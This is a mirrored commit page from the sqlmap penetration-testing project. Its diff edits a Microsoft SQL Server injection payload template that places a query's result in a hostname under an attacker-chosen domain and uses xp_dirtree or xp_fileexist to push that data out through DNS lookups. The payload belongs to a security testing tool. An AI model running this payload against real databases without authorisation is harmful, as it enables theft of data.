mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-05-14 01:16:59 +00:00
Merge 4d259790cd into e40a9a3b87
This commit is contained in:
commit
18c8bfca2a
1 changed files with 2 additions and 2 deletions
|
|
@ -1,4 +1,4 @@
|
|||
DECLARE @host varchar(1024);
|
||||
SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
|
||||
EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
|
||||
# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
|
||||
EXEC('master..xp_dirtree"//'+@host+'/%RANDSTR1%"')
|
||||
# or EXEC('master..xp_fileexist"//'+@host+'/%RANDSTR1%"')
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue